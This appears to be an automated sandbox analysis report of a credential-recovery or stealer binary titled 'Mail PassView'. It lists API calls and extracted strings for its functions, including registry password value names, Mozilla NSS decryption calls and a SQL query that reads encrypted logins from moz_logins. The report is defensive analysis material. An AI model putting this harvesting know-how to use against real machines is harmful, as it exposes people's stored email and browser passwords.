                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                                    • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                                    • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                                    • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                                    • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                                    • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                                    • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                    • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                                    • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                                    • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F674
                                                                                                    • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                                    • memset.MSVCRT ref: 0040F6B8
                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                                    • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                                    • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                                    • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                                    • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                                    • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                    • API String ID: 3567885941-2042458128
                                                                                                    • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                    • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                                    • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                    • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                      • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                                    • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$QueryValue$CloseOpen
                                                                                                    • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                    • API String ID: 4127491968-1534328989
                                                                                                    • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                                    • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                                    • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                                    • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004033D7, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                    • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                                    • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                                    • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                                    • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040FC27
                                                                                                    • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                                    • memcpy.MSVCRT ref: 0040FCB3
                                                                                                    • atoi.MSVCRT ref: 0040FCC4
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                    • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                    • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                                    • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                    • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcmp$_stricmp$memcpystrlen
                                                                                                    • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                    • API String ID: 1113949926-2499304436
                                                                                                    • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                    • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                                    • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                    • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C7CF, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C7F4
                                                                                                    • strlen.MSVCRT ref: 0040C7FF
                                                                                                    • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                                    • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                                    • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                                    • strlen.MSVCRT ref: 0040C88B
                                                                                                    • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                                    • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                                    • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                                    • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                                    • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                                    • atoi.MSVCRT ref: 0040C955
                                                                                                      • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                                      • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                                      • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                                    • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                                    • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                                    • strlen.MSVCRT ref: 0040C997
                                                                                                    • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                                    • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                                    • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                                    • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                                    • strlen.MSVCRT ref: 0040CA45
                                                                                                    • strlen.MSVCRT ref: 0040CA4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                    • API String ID: 736090197-593045482
                                                                                                    • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                    • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                                    • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                    • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0040E4D1
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040E4DD
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0040E4EC
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0040E4F8
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0040E501
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0040E50D
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040E51F
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040E52A
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040E53E
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040E54C
                                                                                                    • GetDC.USER32 ref: 0040E585
                                                                                                    • strlen.MSVCRT ref: 0040E5C5
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040E5D6
                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040E623
                                                                                                    • sprintf.MSVCRT ref: 0040E6E3
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040E6F7
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 0040E715
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040E74B
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040E75B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040E769
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040E780
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040E78A
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040E7D0
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040E7DA
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040E812
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                    • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                                    • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                    • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113D
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401184
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401191
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011BF
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D1
                                                                                                    • LoadCursorA.USER32(00000067), ref: 004011E0
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 004011E7
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401207
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401214
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040122E
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040123A
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401248
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401250
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401270
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040129B
                                                                                                    • DeleteObject.GDI32(?), ref: 004012A7
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 004012CB
                                                                                                    • ShowWindow.USER32(00000000), ref: 004012D4
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012E0
                                                                                                    • ShowWindow.USER32(00000000), ref: 004012E3
                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,00417348), ref: 004012F4
                                                                                                    • SetWindowTextA.USER32(?,Mail PassView), ref: 00401302
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040131A
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040132B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                                    • String ID: Mail PassView
                                                                                                    • API String ID: 3628558512-272225179
                                                                                                    • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                                    • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                                    • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                                    • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                                      • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                      • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                                      • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                    • memset.MSVCRT ref: 0040CEA6
                                                                                                    • memset.MSVCRT ref: 0040CEBF
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                                    • memset.MSVCRT ref: 0040CF68
                                                                                                    • memset.MSVCRT ref: 0040CF7A
                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                                    • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                                    • memset.MSVCRT ref: 0040D076
                                                                                                    • memset.MSVCRT ref: 0040D08A
                                                                                                    • memset.MSVCRT ref: 0040D0ED
                                                                                                    • memset.MSVCRT ref: 0040D101
                                                                                                    • sprintf.MSVCRT ref: 0040D119
                                                                                                    • sprintf.MSVCRT ref: 0040D12B
                                                                                                    • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                                    Strings
                                                                                                    • mailbox://%s, xrefs: 0040D113
                                                                                                    • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                                    • imap://%s, xrefs: 0040D125
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                                    • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                                    • API String ID: 4276617627-3913509535
                                                                                                    • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                    • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                                                    • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                    • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A774, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407BB9: LoadMenuA.USER32(00000000), ref: 00407BC1
                                                                                                      • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                                    • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A8DA
